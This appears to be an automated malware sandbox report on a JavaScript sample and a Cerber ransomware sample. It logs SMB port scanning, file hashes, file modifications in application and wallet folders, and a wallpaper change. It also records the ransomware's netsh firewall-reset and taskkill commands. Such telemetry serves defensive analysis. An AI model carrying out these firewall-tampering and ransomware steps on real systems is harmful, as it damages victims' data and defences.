N/A 10.127.1.181:445 tcp
N/A 10.127.1.181:139 tcp
N/A 10.127.1.182:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.1.182:139 tcp
N/A 10.127.1.183:445 tcp
N/A 10.127.1.183:139 tcp
N/A 10.127.1.184:445 tcp
N/A 10.127.1.184:139 tcp
N/A 10.127.1.185:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.1.185:139 tcp
N/A 10.127.1.186:445 tcp
N/A 10.127.1.186:139 tcp
N/A 10.127.1.187:445 tcp
N/A 10.127.1.187:139 tcp
N/A 10.127.1.188:445 tcp
N/A 10.127.1.188:139 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.1.189:445 tcp
N/A 10.127.1.189:139 tcp
N/A 10.127.1.190:445 tcp
N/A 10.127.1.190:139 tcp
N/A 10.127.1.191:445 tcp
N/A 10.127.1.191:139 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.1.192:445 tcp

Files

memory/2240-8-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/2240-0-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/2240-12-0x00000000001C0000-0x000000000021E000-memory.dmp

\Users\Admin\AppData\Local\Temp\1C86.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/2240-24-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/2240-9-0x00000000001C0000-0x000000000021E000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1560s

Max time network

1566s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js

Signatures

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240226-en

Max time kernel

1792s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"

Signatures

Cerber

ransomware cerber

Contacts a large (1107) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp7470.bmp" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 8 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 8 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 8 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 8 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 8 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 8 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 8 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 4764 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4764 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4764 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4764 wrote to memory of 4192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4764 wrote to memory of 4192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4764 wrote to memory of 4192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

